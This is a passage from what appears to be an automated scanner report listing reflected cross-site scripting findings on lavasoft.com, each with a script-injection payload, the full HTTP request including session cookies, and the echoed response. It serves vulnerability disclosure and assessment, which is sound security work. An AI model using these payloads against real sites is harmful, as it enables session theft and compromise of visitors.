Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules45a38'><script>alert(1)</script>0315653ed5b/img_assist/img_assist.js'>
...[SNIP]...

1.188. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3908'><script>alert(1)</script>9a992f154c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/img_assistf3908'><script>alert(1)</script>9a992f154c/img_assist.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18210
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/img_assistf3908'><script>alert(1)</script>9a992f154c/img_assist.js'>
...[SNIP]...

1.189. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57b9a'><script>alert(1)</script>e31a7e2f8d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/img_assist/img_assist.js57b9a'><script>alert(1)</script>e31a7e2f8d4?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18212
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/img_assist/img_assist.js57b9a'><script>alert(1)</script>e31a7e2f8d4'>
...[SNIP]...

1.190. http://www.lavasoft.com/mylavasoft/modules/node/node.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/node/node.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9b8e3'><script>alert(1)</script>b2e7545d254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft9b8e3'><script>alert(1)</script>b2e7545d254/modules/node/node.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10625
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft9b8e3'><script>alert(1)</script>b2e7545d254/modules/node/node.css?w'>
...[SNIP]...

1.191. http://www.lavasoft.com/mylavasoft/modules/node/node.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b77a'><script>alert(1)</script>236573ae363 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules5b77a'><script>alert(1)</script>236573ae363/node/node.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18338
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules5b77a'><script>alert(1)</script>236573ae363/node/node.css'>
...[SNIP]...

1.192. http://www.lavasoft.com/mylavasoft/modules/node/node.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3037e'><script>alert(1)</script>5801b21d286 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/node3037e'><script>alert(1)</script>5801b21d286/node.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18300
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/node3037e'><script>alert(1)</script>5801b21d286/node.css'>
...[SNIP]...

1.193. http://www.lavasoft.com/mylavasoft/modules/node/node.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/node/node.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78f8b'><script>alert(1)</script>621f0eb0c19 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/node/node.css78f8b'><script>alert(1)</script>621f0eb0c19?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18300
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/node/node.css78f8b'><script>alert(1)</script>621f0eb0c19'>
...[SNIP]...

1.194. http://www.lavasoft.com/mylavasoft/modules/quote/quote.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/quote/quote.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9147f'><script>alert(1)</script>280704c335d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft9147f'><script>alert(1)</script>280704c335d/modules/quote/quote.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10627
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft9147f'><script>alert(1)</script>280704c335d/modules/quote/quote.css?w'>
...[SNIP]...

1.195. http://www.lavasoft.com/mylavasoft/modules/quote/quote.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/quote/quote.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 53b79'><script>alert(1)</script>c3abaa8a500 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules53b79'><script>alert(1)</script>c3abaa8a500/quote/quote.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18232
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules53b79'><script>alert(1)</script>c3abaa8a500/quote/quote.css'>
...[SNIP]...

1.196. http://www.lavasoft.com/mylavasoft/modules/quote/quote.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/quote/quote.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c90a'><script>alert(1)</script>63d1c6ba5a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/quote3c90a'><script>alert(1)</script>63d1c6ba5a8/quote.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18194
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/quote3c90a'><script>alert(1)</script>63d1c6ba5a8/quote.css'>
...[SNIP]...

1.197. http://www.lavasoft.com/mylavasoft/modules/quote/quote.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/quote/quote.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d73a9'><script>alert(1)</script>7f6206abc9a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/quote/quote.cssd73a9'><script>alert(1)</script>7f6206abc9a?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18194
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/quote/quote.cssd73a9'><script>alert(1)</script>7f6206abc9a'>
...[SNIP]...

1.198. http://www.lavasoft.com/mylavasoft/modules/system/defaults.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e425'><script>alert(1)</script>4fd9962d7ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft2e425'><script>alert(1)</script>4fd9962d7ca/modules/system/defaults.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10631
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft2e425'><script>alert(1)</script>4fd9962d7ca/modules/system/defaults.css?w'>
...[SNIP]...

1.199. http://www.lavasoft.com/mylavasoft/modules/system/defaults.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8570e'><script>alert(1)</script>ce7e18db5c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules8570e'><script>alert(1)</script>ce7e18db5c1/system/defaults.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
